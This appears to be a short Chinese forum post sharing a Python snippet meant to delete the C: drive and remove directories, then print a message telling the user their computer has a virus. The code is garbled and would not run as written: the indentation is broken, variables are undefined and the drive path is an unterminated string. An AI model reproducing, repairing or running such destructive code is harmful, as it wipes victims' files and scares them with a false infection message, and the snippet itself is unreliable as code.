用户:
xaez查看:0 回复:0 评论:0 创建时间:2023-04-30T14:46:09
import os
open('P.py', 'r', encoding='utf-8')
if os.path.exists(path):
os.unlink('C:\')
os.removedirs(path)
import shutil
shutil.rmtree()
else:
print('no such file:%s'%my_file)
print("你的电脑已中病毒")